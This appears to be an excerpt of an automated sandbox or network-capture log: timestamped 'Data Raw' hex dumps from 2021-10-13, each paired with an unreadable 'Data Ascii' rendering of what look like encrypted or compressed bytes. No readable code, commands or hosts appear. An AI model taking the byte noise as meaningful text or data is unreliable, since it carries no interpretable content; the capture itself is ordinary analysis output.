70 11 a4 54 65 c9 9d
                                                        Data Ascii: %N?lBO}LA,h'(+PPWq_HTFF,(st938`!)?&U+ C+zyt8HgSp(F6YekoYfc%EaT"z5|*V#Pg[~~[9SJk>~XpTe
                                                        2021-10-13 12:39:36 UTC59INData Raw: 94 1c ae 68 31 a5 6d 60 68 2d 9c d4 55 39 0d 81 e9 07 20 6c 5b e5 2f ac 80 e9 6c 83 bd 74 8e 4b 92 11 19 9d 5c 18 14 90 4a 6e 0c 10 91 e7 74 d0 45 3a 0e 63 6e 00 66 c7 00 9a 52 fb c1 ca 34 2c b8 15 74 91 70 5d f3 8d e1 00 4a 84 26 97 ca 5e 4e 79 dd c8 48 df ce 6f 6b a4 d7 f5 34 9a f2 1c 70 6f 38 03 26 ac 24 9a c7 df a1 da 0e 60 f7 f8 a0 22 5f 60 57 38 08 6f 8f b4 67 7f 3d 6c f4 50 b5 93 5c 62 1f 6f 75 91 48 3f 11 4a 51 a6 4b cc 42 c4 ae 54 6d d8 c4 f1 25 59 78 06 79 e1 ce e0 21 6d 30 a8 77 74 7d cf d2 45 12 d0 bc 31 f9 80 13 b8 9c d6 8d 47 2c c7 76 23 1e 07 00 ea a9 85 23 22 09 1c 71 5a 47 27 0a 6c 40 c5 dd 80 43 69 7d c7 eb 88 68 d5 1f 61 75 8a c7 c0 f9 b7 0a 90 82 6c 56 97 e3 3d 15 92 df 3c 6b 55 85 23 5d 6f b0 88 e3 e8 fe a7 8d b0 4a 5e e5 f8 1f bb f6
                                                        Data Ascii: h1m`h-U9 l[/ltK\JntE:cnfR4,tp]J&^NyHok4po8&$`"_`W8og=lP\bouH?JQKBTm%Yxy!m0wt}E1G,v##"qZG'l@Ci}haulV=<kU#]oJ^
                                                        2021-10-13 12:39:36 UTC60INData Raw: 94 51 33 e4 45 ed ff d2 40 77 06 78 ed fe 0e 8c c9 a0 25 8a 57 30 fd 0d 02 af 48 04 20 34 ef 9a df 83 8d 22 68 cf eb 6a dc 3d da dd cd c5 b3 2b 3d 16 db 34 75 19 36 cf 7e fe 9b 14 80 c7 82 e4 9f ca d5 b6 2b 7a 3d ed 9a 5e 9a 25 7f 56 89 ec af 80 a4 32 e0 98 e3 a8 15 58 1b 59 5a 89 8f 63 1f 82 c4 fb 2c c9 fa 0c ec 45 a6 cb 4f 44 b7 9e f1 fe f2 86 02 af 68 43 b6 5e 1f 8d c0 e6 36 a5 2f 9d 99 f2 f0 15 a2 14 d7 57 92 61 e7 41 f6 50 6f ab 03 43 cf f6 57 27 d8 21 1f 27 0a 84 34 2d ba dc b9 3c d3 53 34 2d 85 d9 cb 3b bb 15 f1 aa 0c 96 dd e1 f8 c7 13 83 84 2a 92 2f 38 5d 26 fe 47 6d df 4f 96 d1 77 b1 45 58 fe 7b 78 dd 5b d5 81 bb 3a e1 1a db 44 57 5a 00 d4 c7 b5 4d 0c f7 0e 68 2a 9f e8 f4 16 4b fc fb f6 cb 6d 0d 86 9a 51 75 4a 81 99 79 37 cb eb 73 60 3c 95 50 7b
                                                        Data Ascii: Q3E@wx%W0H 4"hj=+=4u6~+z=^%V2XYZc,EODhC^6/WaAPoCW'!'4-<S4-;*/8]&GmOwEX{x[:DWZMh*KmQuJy7s`<P{
                                                        2021-10-13 12:39:36 UTC61INData Raw: c3 00 33 d0 21 40 86 ee b8 7a 86 7c 93 18 1d 54 82 58 1d b1 ee 20 84 8f dc bd 3e 97 42 c6 62 fb 74 3a 39 33 9f 84 9f a7 c0 48 06 09 3a 6a 2a db 7c 94 8a 39 c3 df d7 5a 8f 8f fe 33 dd b0 77 20 13 82 b0 20 f5 27 b4 79 72 28 f8 04 3a 80 b8 89 3b d1 d4 74 a1 ba 76 86 f8 d4 c4 8f c2 c4 dc 51 f5 7a 89 fa 88 e5 5f a4 93 81 6f c3 4f 34 58 5c e8 1b 97 95 15 15 66 a0 29 68 0d 5e 63 ee b2 bf 52 c8 be a3 46 81 bb d2 f5 80 25 b1 41 d2 a5 8a 94 b1 2d 75 02 c6 7e 58 1e fd e6 1d 50 0d 99 88 8d 90 df fd f0 69 0a 2c 76 e8 d2 a1 64 38 4e 57 91 f8 66 69 43 99 03 f0 05 7c ed 6c de 69 15 93 6b b8 00 42 ba 7b c1 5e c7 73 0d 84 03 41 cb 97 63 a9 b4 b4 52 5d 5c fa 3d 09 d3 39 cd dd 2c 77 ee 2a bd 6c 5f fb 6b 92 61 2c a1 fc 48 9f f5 80 ac b0 e9 50 33 e4 ba ed ad d2 3c 76 81 79 e2
                                                        Data Ascii: 3!@z|TX >Bbt:93H:j*|9Z3w 'yr(:;tvQz_oO4X\f)h^cRF%A-u~XPi,vd8NWfiC|likB{^sAcR]\=9,w*l_ka,HP3<vy
                                                        2021-10-13 12:39:36 UTC63INData Raw: 44 4d 2b 17 5d 3e 10 60 1b 8e 8d 3b fa c0 62 4a 3f ae 09 6f 84 a2 57 e6 a3 c0 da c6 bd 2b 88 9f 71 74 71 c9 dd 4f f0 77 68 7d 8e 0c e4 34 9a 64 1e 70 69 23 0d 1b bd 23 88 f8 4e 89 36 0f fc ec ee bf d8 8c ba 48 17 85 79 a0 0f 78 46 ab 62 e3 63 79 14 5c 68 c9 ec 5d cb 8e 0c cf 42 40 a3 ff 30 44 d9 84 4a 2c d8 c4 6c 1c 69 67 19 02 71 ce e1 29 b2 03 0d 66 72 6c 5a fd 7c f2 25 63 80 d1 21 13 24 87 db 4c 5e 24 16 76 23 14 b3 3f ef b6 8f 36 59 ad 0d 76 4f 94 38 76 da 51 c2 83 92 63 fc 7d c7 eb 14 79 d2 00 6e 10 f7 5b d1 84 a9 1a 86 0c 7d 51 88 e8 2b 89 82 c3 13 7e 43 1f 33 5a 70 dd 9e 7f e8 fb b2 9b b0 b9 ab e3 e7 00 b2 35 c3 ea ce 02 25 7c 6d b1 e9 da b9 9d f8 97 d6 63 5e 7a 42 a9 a0 13 ce 0a 54 97 b7 57 68 21 dd 89 f0 e5 b3 d7 25 4c 3a 51 67 f7 bf ed f8 b6 8c
                                                        Data Ascii: DM+]>`;bJ?oW+qtqOwh}4dpi##N6HyxFbcy\h]B@0DJ,ligq)frlZ|%c!$L^$v#?6YvO8vQc}yn[}Q+~C3Zp5%|mc^zBTWh!%L:Qg
                                                        2021-10-13 12:39:36 UTC64INData Raw: 3c 71 17 d2 28 0b 18 1a dc 26 44 a3 63 75 33 55 a3 b1 ca d3 a0 33 32 39 81 9f 54 93 87 3d 52 98 99 38 ae a6 38 ec aa 86 b2 15 52 32 eb 43 98 9c 66 67 b7 ec 63 25 e1 aa 20 c2 41 c9 7e 66 ac bc 3c ea cf 44 f8 3e a5 7b 4d 98 21 ea 8e c6 8f ad 8a 2d 97 3d cb 01 0c dc 22 ff f6 98 49 b5 56 f1 50 28 80 01 43 c3 7c 68 3c c1 59 0b cf 0b 8e 16 5c 1f dc bf 59 73 57 25 21 0f e6 d0 37 b5 10 c8 92 1f 86 ef 29 04 c6 02 95 bd 15 80 b5 33 42 37 1c 45 6d d5 50 07 64 29 9d 48 5f e1 b0 cc cf 63 64 92 bd 12 de 0b ca 50 db 61 2a dd d6 bb 34 91 b6 7d 40 3b 9a 9d 83 1f 5a fe c0 a9 d8 68 23 b3 b6 53 73 23 25 90 68 3b b0 31 70 76 c4 85 49 6f 11 56 84 4b 10 47 cd 4e f1 0d 10 7e e8 70 55 ad 65 8b 69 dd 11 1e 8f 1b 12 16 90 46 62 7f 16 87 19 74 a3 5c 2e 2e 28 71 11 66 7e 39 a4 52 f1
                                                        Data Ascii: <q(&Dcu3U329T=R88R2Cfgc% A~f<D>{M!-="IVP(C|h<Y\YsW%!7)3B7EmPd)H_cdPa*4}@;Zh#Ss#%h;1pvIoVKGN~pUeiFbt\..(qf~9R
                                                        2021-10-13 12:39:36 UTC65INData Raw: f9 7a fe 8e 3f aa 8a f3 5a 85 89 c7 18 b2 7d 7d 0c 05 8a 52 0a ac 48 79 73 1d 00 ee fa 32 f7 fc b9 48 f5 fe 50 a7 a9 71 bf 78 dd ab ad cc cd 54 f7 f0 e5 3a 43 bb c8 54 d1 3d 8c 68 a6 62 eb 31 5c f9 16 b6 52 a6 1d ee 78 d5 7d d7 4f b3 72 aa d0 4a c8 ad ad 91 1a 29 ec f3 ab 33 b2 dc 6b c1 ef 87 af 34 72 01 e7 6f 5c 05 29 d6 1d 4b 80 67 f2 98 81 c8 c4 c6 e7 bd 19 0c 07 27 49 a3 2d 53 90 88 ef 69 5e b3 81 b3 cc ed b2 25 a4 d8 47 34 2a dc a9 0e df 02 1f a4 4d d8 6a 0c 87 24 50 cf 8c b1 a3 a3 95 c1 5f 36 fe 7c 3b fb 1d cd dd 26 d5 3a 21 aa ba 91 f0 7a 9e d4 fb b2 f0 4c 93 e4 9f 87 6b 9a a3 32 e4 b0 fe f6 c3 38 65 27 6e f1 de 36 3e d6 a0 25 9a 74 21 dd 97 4d ba 59 11 04 22 f6 e9 b5 83 8d 28 6d de fa 7b c8 15 59 df d6 f3 a1 a6 7b 17 db 35 e1 0d 22 f6 a5 41 9b 1e
                                                        Data Ascii: z?Z}}RHys2HPqxT:CT=hb1\Rx}OrJ)3k4ro\)Kg'I-Si^%G4*Mj$P_6|;&:!zLk28e'n6>%t!MY"(m{Y{5"A
                                                        2021-10-13 12:39:36 UTC66INData Raw: f7 f3 ba 41 0c d0 2b 57 da fd 8f 65 c1 03 93 18 1d 6a 26 5a 42 97 e3 dc 8e a7 26 95 e9 90 51 c8 5b d5 5c ca 33 20 96 9e 81 83 bb d6 2e dd 57 77 2d f3 58 bb ab 2e a3 8a b9 5e 85 85 80 2a b3 7d 7d 0c 1b be 5f 33 fd 60 16 7d 72 24 80 e7 39 df 9e 84 8c f3 d6 74 b6 bf 64 9e 23 cf bc b6 d4 d2 e9 11 e9 7d 95 43 bf f0 74 eb 93 9c 7b 8b 78 11 49 7d 96 31 bd dc 17 04 6e d8 8e 6d 0d 58 64 ec 9d c1 68 df af be 14 ab 9e fa c3 22 34 99 46 f4 64 35 94 bb 0f 22 2a fe 74 70 f9 22 df 06 69 cd 4e 9b 96 a9 ea ec e2 ed d2 3b ac 16 2b 4f 62 29 8f 92 95 ef 79 78 df 8e 3d 7b fa 90 34 a3 ed 5a 2c b3 e7 87 0a 51 b4 aa 6f 78 d3 51 b2 ac 3b 4b d4 bd 31 94 b2 9e 5a 61 74 4a 7c 3d d9 15 e2 cc 22 60 a6 2d bd 6c 83 e8 48 83 e0 3b b0 eb d1 a0 f5 80 b7 12 f8 72 27 cc 08 ed ff d8 23 09 8a
                                                        Data Ascii: A+Wej&ZB&Q[\3 .Ww-X.^*}}_3`}r$9td#}Ct{xI}1nmXdh"4Fd5"*tp"iN;+Ob)yx={4Z,QoxQ;K1ZatJ|="`-lH;r'#
                                                        2021-10-13 12:39:36 UTC67INData Raw: ec 64 c8 5c 3b 37 af 7c 9f d7 06 56 b2 84 76 ff 68 25 25 bc 0d 74 93 b0 4f f4 1f 26 dd a7 25 2f 80 da f8 48 78 47 6b 4b 2d 4e 73 6a ae f5 cf 00 92 76 b8 6f a6 2b f1 90 7a a9 af d8 cf 88 25 03 68 eb f8 aa ee 40 34 ff 3f 05 69 a7 1f 6f 69 26 7f ec f6 ee 9a d2 df e1 6c 4d cc 98 38 18 53 4c af 77 32 4f cd 2a 6f 24 56 73 c0 c9 67 f7 b1 64 37 c8 30 bb 84 23 ae 67 61 69 d1 e5 f5 5a 38 99 2a c0 32 1e 93 8e cd 56 44 09 e7 ac 2a 05 22 ba e0 b8 8e 3e d0 a5 7d ef 41 94 30 da 55 4d d4 91 8d 52 58 9f d6 ee 06 df c2 c5 76 d9 06 f8 c0 83 b7 19 96 86 7d 53 19 4e 25 cf 80 d6 1f 62 7e d1 33 58 7e c0 1c f2 fd ed a3 1b 7c 33 95 fc e9 13 b5 a7 c3 e8 c0 1a 91 a3 92 b1 e9 46 7e 8b e3 91 ce 6b 95 e3 76 a1 a7 89 ce 03 5a 8b 86 d9 fc 30 d9 04 ef 76 76 53 35 c1 2d 47 76 78 81 9c e8
                                                        Data Ascii: d\;7|Vvh%%tO&%/HxGkK-Nsjvo+z%h@4?ioi&lM8SLw2O*o$Vsgd70#gaiZ8*2VD*">}A0UMRXv}SN%b~3X~|3F~kvZ0vvS5-Gvx
                                                        2021-10-13 12:39:36 UTC68INData Raw: fc 39 9c 02 70 db 34 f1 97 81 08 0f cf 2c 03 50 1a bd 72 16 e1 d3 bb 02 28 31 e4 8d 5c 9a 83 8a 7a ad eb 87 a4 d8 55 e6 b0 0f bf 04 5a 3a 76 ed f7 e2 70 19 8f 62 d4 07 d5 fd 24 c8 45 b0 dc 6f a5 38 29 85 b1 53 86 06 2b cc 91 b2 f8 59 a6 dc e1 1e 81 3c 9b 8e d2 77 32 a3 1e f5 e5 96 12 c7 53 f1 5c 54 3a 11 4a de b1 54 24 d8 2d 26 c6 1c eb 10 04 1b d6 a6 2e 4d 7d 25 2b ac e4 c3 25 30 28 d9 84 0d 85 d2 fe 17 cc 0b 0a 1b 2c b4 2e 3e 41 1f d4 51 7c df 50 e6 67 36 b5 5e 4d f2 ac ce d9 45 c4 95 ab 0c e7 04 da 42 4b 63 27 c5 cd d0 70 23 b7 77 5b 21 8e eb 88 32 5b f4 d9 be c0 02 24 e8 b2 59 7e 4b 93 87 6b bf 13 a0 41 61 3a 8e 4b 6d 11 14 81 4b 1c 39 7f 20 ea 06 04 8a e5 6e a1 72 61 ab 69 b6 15 1e 83 67 ac 3f be 4e 76 87 1d b9 df 75 c3 47 f5 06 73 5f 11 60 50 90 a5
                                                        Data Ascii: 9p4,Pr(1\zUZ:vpb$Eo8)S+Y<w2S\T:JT$-&.M}%+%0(,.>AQ|Pg6^MEBKc'p#w[!2[$Y~KkAa:KmK9 nraig?NvuGs_`P
                                                        2021-10-13 12:39:36 UTC70INData Raw: 6a 26 f9 43 92 9d e9 bf a6 c6 5e 94 86 de f6 6c 6f 5f 17 19 95 44 0a dc 4a 79 7f 7f 0a d7 fa 38 d5 4a b1 60 b8 d7 74 ad a1 14 8c f4 dc a1 8d c9 ee da 40 f8 6a 9d 95 ac e7 5f 92 82 c1 15 ac 7b 2c 58 5a f8 0d 8f d4 11 37 65 cf 03 ff 0d 58 74 8c 00 d0 4a c3 b4 da 66 95 9e f0 ce 88 0d c6 56 dc d0 1d ea b5 27 7e 02 66 7d 58 12 50 20 0d 41 10 20 9b 9e 81 c4 e4 ca 98 b9 13 a8 3e ad 5a 75 38 71 19 81 fe 71 1c ad 88 3d 71 94 83 10 b2 c1 44 15 d9 6f b8 0c 79 34 0c 7e 58 ef e1 03 ac 3d 32 34 9c bd a1 dd 9e 59 77 56 f2 54 42 d7 39 cb f5 ae 73 2b 2c 95 f4 81 fb 6d e1 3c 2c a1 f6 32 9f f7 80 bc b8 c1 d2 37 e4 bc c5 7b d6 3c 70 2e e0 e1 fe 08 ff 2c a1 25 81 3a 30 ff 0d 54 a7 60 87 19 35 e9 b2 c2 86 8d 24 56 4a ef 6a da 4e 25 dc d6 ff d8 2b 7e 17 d1 3c dd 9f 32 de 0b 69
                                                        Data Ascii: j&C^lo_DJy8J`t@j_{,XZ7eXtJfV'~f}XP A >Zu8qq=qDoy4~X=24YwVTB9s+,m<,27{<p.,%:0T`5$VJjN%+~<2i
                                                        2021-10-13 12:39:36 UTC71INData Raw: 20 b2 50 0f 77 74 14 8a 87 ac 2e ff fe cd 89 30 1e 71 f4 f8 ac 97 4b b8 48 1d 62 6d a5 15 6d 10 1f 71 e4 7e 48 83 74 46 cb 70 4a a3 b6 2e 14 44 46 b2 72 4e 5b c5 a4 d2 3d cc d3 26 1e 7a 68 12 62 f8 51 51 09 06 dd 51 99 63 66 d1 3a 68 e7 3e 49 28 c2 1f 4d 46 69 23 55 7f 04 f0 77 33 14 2f 2e e8 9c 82 e7 09 33 10 6b 50 99 26 1f 76 46 c5 b3 9e 43 69 eb c7 eb 99 7e c6 17 59 1a 89 c7 c0 83 a7 02 8f 82 92 57 bb fe 2c 11 9e db 1f 7f 5d 83 33 55 70 c5 76 e2 d5 fb bc 88 ab 3a b6 f7 f0 15 b5 a1 ce 13 d0 38 0d 92 6a a8 f5 da b5 89 ef 80 d1 f7 51 83 5c 9d bc 9e d8 16 54 c0 0b c8 61 32 d5 15 f0 ea b3 db cd d1 07 5b 70 e5 bd 1e ee b3 93 12 1d 5d 6b 49 4a 9d da 39 92 59 2d 91 37 80 56 d8 6c d2 c0 d4 2a 3b 99 9e 86 b4 c7 2c 2f f7 34 7b 2a ee 6c 7f 8a 3f ac bd c5 49 8d 83
                                                        Data Ascii: Pwt.0qKHbmmq~HtFpJ.DFrN[=&zhbQQQcf:h>I(MFi#Uw3/.3kP&vFCi~YW,]3Upv:8jQ\Ta2[p]kIJ9Y-7Vl*;,/4{*l?I
                                                        2021-10-13 12:39:36 UTC72INData Raw: 5a 89 8f 7a 06 91 c4 3d 2f c9 f6 0c 54 43 a6 cb 4f 6e b6 9e f1 dd 4c 9c 2a fb 7b 47 ba 5e 79 8a c0 e6 36 49 2d 9d 95 d6 10 3c 8d 1e ff fc ab c6 ec 52 f1 51 6f 02 00 43 c3 f3 7e 23 d5 fa ad ce 0b 84 39 76 96 dd b9 30 d3 52 34 2f 85 a3 cd 3b bb 6c 5e 85 0c 90 fa f0 00 cb df f9 ad 04 90 39 2f 4f 61 58 46 6d d3 4e b2 c3 27 8e 47 74 be a7 df dd 4a d1 81 b8 04 a0 91 da 42 47 61 28 fc 8c be 5b 28 a6 79 5b 2d 88 81 6e 1f 5a f2 bc 32 c9 6d 01 fa b5 5b 5d 53 93 91 6e 20 a2 e7 56 60 3a 8e 70 45 39 0d 8a 72 ea 28 78 4f e0 00 2c 87 e9 66 80 bf 7c 9f 49 b8 f9 1e 89 74 b6 1f 84 64 ee 85 17 97 f1 f8 c4 4d 2b 07 61 61 05 48 b9 8c a5 58 ef e8 b3 26 24 a9 1f e8 90 a6 46 e3 9f 23 ce ee 13 26 97 c1 d4 fe 71 c9 d6 4d f3 4e 61 6a ae f9 f7 3d 8b f0 1b 5f e6 38 2b 81 ba a9 97 d8
                                                        Data Ascii: Zz=/TCOnL*{G^y6I-<RQoC~#9v0R4/;l^9/OaXFmN'GtJBGa([(y[-nZ2m[]Sn V`:pE9r(xO,f|ItdM+aaHX&$F#&qMNaj=_8+
                                                        2021-10-13 12:39:36 UTC73INData Raw: ce db d0 60 0a 6b 8d 95 30 f6 51 bd 89 93 5f 30 78 38 47 56 d9 83 bf dc 11 89 71 c1 1c 67 2d 89 65 ff bf 4c 5b c7 a1 a7 b8 5b 9e fa c2 1c 34 b5 4d d3 c9 03 08 a0 29 67 3a e1 0f c4 05 2d c0 1d 61 c4 4f 9b 9c 1d df e2 fd f5 a2 6d 32 07 23 41 66 21 02 1d 93 f0 68 7b 4d eb a1 6a f5 9c 07 ad f3 d0 2c aa 74 ae 2a 84 b5 08 7e c2 d6 77 1f bb 1b ba cb 9d bd 37 a3 90 44 6f 7c 21 7c 3d d3 a5 dc d3 33 6e 34 4e 21 7d 8c e4 71 b2 65 2d a1 fc c1 8e fb 9f ad af a2 cd 22 ea a5 f1 df 01 3c 76 06 e4 f3 f0 11 91 cc fa b9 9a 5b 2f e3 16 c2 be 46 1b 02 2a bc 06 57 8c 80 3d 6e 42 c0 6a dc 3c c9 d3 c7 fb a1 0b e4 17 db 34 69 08 38 c9 12 4e 07 05 84 d4 b5 cc 07 db dd a2 23 f5 39 ed 9c c8 82 03 27 4d fe 76 96 a0 bd 2d a5 2c 1a a7 09 4d 7f 64 4b 87 98 6f 5e 17 fd 6d 31 e9 05 24 c2
                                                        Data Ascii: `k0Q_0x8GVqg-eL[[4M)g:-aOm2#Af!h{Mj,t*~w7Do|!|=3n4N!}qe-"<v[/F*W=nBj<4i8N#9'Mv-,MdKo^m1$
                                                        2021-10-13 12:39:36 UTC75INData Raw: f5 2f f8 63 21 49 c2 2a 6f 02 cc de fd 0d 67 63 f8 72 c1 db f2 1c a0 2e ae 6f 69 92 c7 c0 5e eb 39 6b 2f d0 21 19 af 4c cb 85 d8 2f f0 76 22 1f 2d 29 fe ae 0d 9e 65 6a 1c 71 5a 9e a9 bb 68 68 d1 b6 80 4e 69 74 df 15 89 44 dc 05 ec 24 8b c7 c1 89 af 07 90 99 7a a8 96 d5 3f 02 9e c4 05 70 ab 82 0e 5f 44 cc a3 60 fe d6 ad 8f bd 15 b3 e4 09 14 a4 a9 72 ed d1 05 76 3c 6d b1 e3 4d b7 86 cf de c0 ff 45 77 5b 99 17 8b df 0b 63 4c 97 d7 62 52 c4 17 e1 e8 a1 c4 5c ca 29 56 72 c1 a5 59 4b b5 93 1e 3f 59 7e 5a 48 9a e1 38 a7 04 28 bd 38 fe 4d c0 73 fb 4f c6 2f 20 92 b7 12 aa d6 d2 3f d7 29 61 b6 e0 56 87 8e 50 b1 a0 d7 50 96 8d f9 24 bf 45 04 21 19 95 5f 2c e3 45 e3 6a 74 33 e9 95 b7 de 94 b7 60 57 d2 74 a1 81 b9 97 f5 d6 b8 a2 d1 c1 f2 71 f8 6b 87 ac eb e6 5f a2 f1
                                                        Data Ascii: /c!I*ogcr.oi^9k/!L/v"-)ejqZhhNitD$z?p_D`rv<mMEw[cLbR\)VrYK?Y~ZH8(8MsO/ ?)aVPP$E!_,Ejt3`Wtqk_
                                                        2021-10-13 12:39:36 UTC76INData Raw: 7b ed 52 f0 4d 77 37 00 6d c9 de 79 05 d8 27 26 e7 97 84 3e 0f 19 f4 d0 37 c0 5c 31 3c 85 62 c8 3b b7 6c c2 85 0c 9c dd 29 14 ee 35 84 ac 0e b8 01 3c 4b 08 da 6f 55 d5 59 62 0e 28 9b 68 4c f2 a7 cf dd 5b d5 90 bd 12 d5 02 db 50 5b 72 2e d5 dc 8f 5f 22 94 7d 4a 28 bf ee e7 0f 72 68 d3 af c3 6f 1f ff 9a c6 74 4c 9a fe 73 30 a4 c5 7b be 36 ac 6f 6a 39 07 a8 73 16 28 72 91 f1 01 2e 80 e8 76 ab ac 74 8e 41 81 00 0b 89 78 bd 17 90 4d 68 83 3f 8e e5 75 c9 67 38 36 76 75 ba 62 11 8c 06 52 fb d1 7e 28 1c 32 0b 65 97 a6 4f fd 9a c9 db ea b5 f6 b5 cb fc 5d 59 dd dc 5c fd 6a 70 79 a3 ff ed 29 64 f9 23 70 46 a9 2a 87 ac 3a 9d d8 c6 96 2d f1 61 d1 e1 9e 89 4a ba 48 08 05 65 a7 1c 7e 81 36 5f ea 7b 2a 99 5e 68 c3 1f 40 ce 92 26 1f 58 4d a3 6a 3e 50 3a a5 f4 39 dc ec ca
                                                        Data Ascii: {RMw7my'&>7\1<b;l)5<KoUYb(hL[P[r._"}J(rhotLs0{6oj9s(r.vtAxMh?ug86vubR~(2eO]Y\jpy)d#pF*:-aJHe~6_{*^h@&XMj>P:9
                                                        2021-10-13 12:39:36 UTC77INData Raw: 1d 90 dc dc 35 94 b1 27 6b 1a fc 7e 70 14 23 df 04 41 1a 5e 8d 97 aa d5 ec e5 f0 43 12 82 14 35 55 75 39 4f 7f 83 d2 75 78 59 89 3a 63 05 82 3e b0 e0 4e 16 47 69 c3 62 51 b5 0c 54 7c c5 7a 7d c4 3b 41 cf b7 bd ab b2 8d 6b 75 5c d2 7c 3d d3 3f cd dd 3d 61 20 01 a6 6c 85 ec 95 93 ef 2f b9 f7 5d 98 e3 7e b7 9c eb 46 38 e4 bd f5 01 d3 10 74 2d 7a c9 1d 0c f7 ba a0 25 8f 7f 12 ff 0e 23 c6 48 04 19 1f ef 9a 46 91 bd 20 7e e7 eb 6a dc 3b da dd c7 e3 bc 00 67 17 dc 23 0b 18 1a dc 15 4a 9b 13 9c 32 ab 88 99 dd d8 bb 04 23 c7 ec b0 56 b8 0f 16 b1 8b 91 ed ae a6 36 cc 92 09 aa 68 38 33 f8 5e a3 85 70 19 98 dc 61 2f e1 fc 24 c2 41 a6 cd 76 ba bd b5 e0 d6 54 91 fc a4 57 45 a8 7d ee 89 d6 1e 1f a7 2f 8a 94 da 1f 0c 5c 1f d3 f4 b9 63 c6 b1 f3 2d 2c 33 00 47 e3 fc 7b 26
                                                        Data Ascii: 5'k~p#A^C5Uu9OuxY:c>NGibQT|z};Aku\|=?=a l/]~F8t-z%#HF ~j;g#J2#V6h83^pa/$AvTWE}/\c-,3G{&
                                                        2021-10-13 12:39:36 UTC79INData Raw: 6d 2f 2e ec 83 83 29 0a 22 2c 73 50 b1 27 0c 46 d1 c5 9c 8d 55 62 56 dc eb 8f 7f 2b 1e 4d 0d 93 cc c0 84 a0 f4 91 bc 6e 41 9c f9 3a 0d 6d c5 20 6e 7e 81 09 be 6d b5 f2 e3 f9 f8 87 b9 a4 26 92 f5 f8 15 ae d4 a8 ed d1 10 2f 83 6d a2 d9 45 a8 e9 e7 80 c0 ff 4f 7d 5d b3 9e 98 df 0d 41 8d ba dc 40 1f d8 15 e7 91 85 cf 33 da 51 54 0b bd a8 71 ef de d0 19 17 44 7e 59 6a df ce 31 89 c8 07 bf 3e 9b 3e f9 72 f1 5a c8 56 71 98 8f 88 a8 fe ed 2b db 3e 05 07 f1 52 9c e5 6c ad a2 d1 58 ea c1 ee 37 b4 7e 5f 60 1c 95 48 4d d9 4a 79 73 1d 77 ee fa 3e dd fb ff 49 f3 d0 77 8f e8 7e 97 f3 b3 80 a5 c0 ce b5 17 f9 6b 8b bf b2 f4 6f a0 82 a4 68 ac 69 3e 58 5a e8 00 b4 f7 0a 15 67 d8 fd 6b 21 5a 7d f4 bf d7 5c 37 bf 85 9a 83 95 fa c5 98 db ba 7e de fd 37 bf 52 25 03 51 fe 7e 5c
                                                        Data Ascii: m/.)",sP'FUbV+MnA:m n~m&/mEO}]A@3QTqD~Yj1>>rZVq+>RlX7~_`HMJysw>Iw~kohi>XZgk!Z}\7~7R%Q~\
                                                        2021-10-13 12:39:36 UTC80INData Raw: 90 2f 3e d7 08 cc 58 25 49 5f 75 cf 16 01 44 52 ed ee 43 db 44 dc 8f c0 8e c9 07 d1 5d 7f ee 28 cb cc a0 51 be b1 62 46 37 fd 72 e1 01 57 e9 4f a9 d6 63 2b 34 b2 53 75 d0 96 8e 67 2e 82 53 77 7f 2a a4 be 6a 39 0d 1c 4d 09 39 67 28 6d 01 1b 92 c9 e7 ab ac 74 12 47 9e 06 07 15 72 b8 03 b0 ab 76 81 17 0d e1 6a d6 6d 99 06 75 75 8d 66 0e 9a ba 41 67 c6 77 32 04 0a 09 65 97 3a 40 fd 93 17 6a c6 bb 26 0b cd e3 46 6e b0 40 5a e8 7c 4f 85 ae ff e4 a8 9c e7 14 68 31 a0 2d 98 b0 3b 9f 44 c9 96 2b 10 21 61 ef b9 e6 57 af d4 11 06 77 87 f8 67 7f 37 ef e2 67 79 8d 27 f4 cf 6f 6d d3 86 b0 12 5d 62 83 ef 21 43 c4 38 de 33 fb e4 15 0d 6e 79 9a 75 f2 fb f9 7d 27 25 b1 43 6d 2a 5a ea 64 cb 30 4e a5 d7 3e 34 98 57 dc 53 55 98 f6 69 0b 34 a1 2e e8 a9 1f 2f 15 18 3c 8f 50 99
                                                        Data Ascii: />X%I_uDRCD](QbF7rWOc+4Sug.Sw*j9M9g(mtGrvjmuufAgw2e:@j&Fn@Z|Oh1-;D+!aWwg7gy'om]b!C83nyu}'%Cm*Zd0N>4WSUi4./<P
                                                        2021-10-13 12:39:36 UTC81INData Raw: 08 4c ca 60 37 d7 49 ba 0a 57 a6 0f 65 4d cc 79 11 a7 24 51 35 9c 91 a1 a3 96 4c a1 4f f2 63 2c c0 32 cd cc 27 68 24 d4 bc 40 8e f2 7a 95 ac 35 a0 fc 57 80 e5 93 bd b0 f8 5a 2c e8 44 ec d3 cd 2d 71 00 69 ea 64 26 3a d7 a0 23 a3 e2 34 fd 0b 45 87 27 05 1d 33 80 b2 44 82 8b 3d 73 dc e0 6a cd 36 c1 23 d7 d9 a5 23 54 a3 df 34 f3 31 4f de 0d 4b 8c 8e 99 c9 b6 b7 90 ca c2 b0 1c 31 c7 ec b0 5d ab 9c c3 ad 76 f5 8c bd ad 32 f7 bb 13 57 14 7e 39 fa 72 13 85 70 13 87 f5 70 24 c9 ed 2f dd 4c 58 cc 4b b3 a7 99 fd c7 5b 1c 2a 13 7f 47 b6 5e 59 8a c0 e6 08 a3 42 9c 9f dc 77 30 a0 1e f9 e9 9e 72 e6 52 e0 5d 51 cd 01 6f ca c9 6a 2e d8 36 3c d0 19 7a 3f 29 19 f7 bc 0e e4 a8 da d4 a4 dd c9 3b ae 33 dc 84 45 96 d7 f7 ad c6 02 95 ba 08 bb 1e 3e 43 16 2e 46 41 da 5b 16 76 28
                                                        Data Ascii: L`7IWeMy$Q5LOc,2'h$@z5WZ,D-qid&:#4E'3D=sj6##T41OK1]v2W~9rpp$/LXK[*G^YBw0rR]Qoj.6<z?);3E>C.FA[v(
